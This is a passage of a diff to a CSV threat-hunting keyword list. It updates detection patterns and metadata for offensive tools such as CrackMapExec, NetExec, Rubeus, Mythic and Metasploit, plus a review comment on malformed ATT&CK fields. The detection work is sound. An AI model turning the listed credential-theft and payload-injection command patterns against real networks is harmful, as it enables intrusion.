APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "* MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" -"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "* Microsploit.sh*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . 
Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "* mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1276,21 +1276,21 @@ "* mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* moodlescan -r -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* ms17010 -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* ms17010 -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" -"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "* --msfoptions *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --msf-path*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" "* msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M met_inject*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M mssql_priv*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* mssql * -u * -p * -M web_delivery *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
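Review bot: The re-emitted `* msfdb run *` row in this hunk still has `T1204 -T1210` in `metadata_tool_techniques`, while every other row separates technique IDs with ` - `. If a consumer splits that field on ` - ` (an assumption, the parser is not shown here), these two IDs arrive as one unrecognised token and drop out of any ATT&CK mapping built from the list; the field should read `T1204 - T1210`. The `* -method * -nthash *` (LdapRelayScan) row in the preceding hunk has the same problem with `T1595 T1590 T1591`, which should be `T1595 - T1590 - T1591`. Since the rows are being rewritten for the star and fork counts anyway, a format check on the technique column during generation would catch both.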
@@ -1316,12 +1316,12 @@ "* mysql-variables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* mythic start*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* -n *TotallyLegitTool*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense 